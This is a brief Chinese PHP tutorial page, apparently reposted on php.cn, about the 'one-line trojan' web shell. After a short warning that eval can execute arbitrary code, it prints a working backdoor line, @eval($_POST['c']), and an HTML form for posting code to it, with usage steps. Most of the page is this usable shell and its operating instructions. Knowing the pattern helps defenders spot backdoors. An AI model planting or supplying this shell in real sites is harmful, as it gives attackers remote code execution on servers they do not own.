Maison > développement back-end > tutoriel php > php eval函数一句话木马代码_php技巧

php eval函数一句话木马代码_php技巧

WBOY
Libérer: 2016-05-16 20:15:11
original
1114 Les gens l'ont consulté

eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要小心,可能是木马

就这一句话害死人,这样任何人都可以post任何文件上来,所以要做好防范

<&#63;php @eval($_POST['c']);&#63;>
Copier après la connexion

使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行

<html> 
<body> 
<form action="a.php" method="post"> 
<input type="text" name="c" value="phpinfo();"> 
<input type="submit" value="submit"> 
</form> 
</body> 
</html>
Copier après la connexion

以上所述就是本文的全部内容了,希望大家能够喜欢。

Étiquettes associées:
source:php.cn
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal